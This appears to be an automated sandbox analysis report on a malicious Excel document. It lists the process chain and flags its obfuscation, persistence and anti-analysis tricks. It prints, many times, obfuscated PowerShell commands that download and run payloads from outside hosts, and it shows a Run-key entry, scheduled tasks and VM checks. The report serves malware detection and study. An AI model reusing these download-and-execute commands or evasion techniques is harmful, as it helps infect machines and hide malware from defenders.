Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ps.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120349465.0000000002B70000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2139019469.0000000002B80000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2116599990.0000000002AD0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: ps.exe.23.dr, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: GvthaHtVzpRh.exe.24.dr, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.ps.exe.e70000.2.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: svchost.exe.27.dr, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.ps.exe.e70000.1.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 27_2_004F1750
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FF002606FD pushad ; ret 7_2_000007FF00260741
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00E7B93E push es; ret 24_2_00E7B9B3
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_0029887D push esp; retf 24_2_0029887E
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00296AB5 push esp; retf 24_2_00296AB6
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_002994C1 push esp; retf 24_2_002994C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00297F27 push esp; ret 24_2_00297F51
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00297F58 pushad ; ret 24_2_00297F75
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A721B push ecx; retf 24_2_004A721C
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AF11AA push cs; retf 24_2_00AF1FE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00480FEB push eax; mov dword ptr [esp], 00401500h 27_2_00481022
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00480FEB push edx; mov dword ptr [esp], 0040150Eh 27_2_00481045
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_0041E390 push eax; mov dword ptr [esp], esi 27_2_0041E433
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_0041E560 push edx; mov dword ptr [esp], ebp 27_2_0041E748
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_004019C9 push edx; mov dword ptr [esp], eax 27_2_00401BED
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_004019C9 push ecx; mov dword ptr [esp], eax 27_2_00401BF9
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401D0B push eax; mov dword ptr [esp], esi 27_2_00401DE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401ED2 push edx; mov dword ptr [esp], 00000064h 27_2_004020C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401ED2 push ecx; mov dword ptr [esp], edi 27_2_004020D0
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi 27_2_004020E4
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401ED2 push edi; mov dword ptr [esp], 00000064h 27_2_004021AD
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi 27_2_004021B7
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00E7B93E push es; ret 27_2_00E7B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_0023B93E push es; ret 32_2_0023B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_0020887D push esp; retf 32_2_0020887E
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_00208158 push esp; ret 32_2_00208159
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_00207A76 push esp; ret 32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_00206AB5 push esp; retf 32_2_00206AB6
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_002094C1 push esp; retf 32_2_002094C2
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_00207EC4 push esp; ret 32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C721B push ecx; retf 32_2_003C721C
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 35_2_0023B93E push es; ret 35_2_0023B9B3
Source: initial sample Static PE information: section name: .text entropy: 7.92184485792

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Users\user\AppData\Local\Temp\ps.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
Tries to download and execute files (via powershell)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\ps.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ps.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe File created: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, type: MEMORY
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\mode.com WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ps.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ps.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 2436 Thread sleep time: -51103s >= -30000s
